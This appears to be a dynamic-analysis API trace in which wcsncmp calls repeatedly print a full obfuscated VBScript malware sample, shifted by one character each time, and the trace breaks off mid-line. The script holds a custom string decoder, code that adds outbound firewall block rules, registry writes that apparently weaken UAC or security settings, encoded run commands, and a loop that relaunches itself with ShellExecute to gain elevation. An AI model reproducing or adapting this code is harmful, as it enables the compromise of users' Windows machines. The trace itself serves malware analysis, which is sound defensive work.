bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.281] wcsncmp (_String1="ndex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.281] wcsncmp (_String1="dex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.281] wcsncmp (_String1="ex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.281] wcsncmp (_String1="x\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 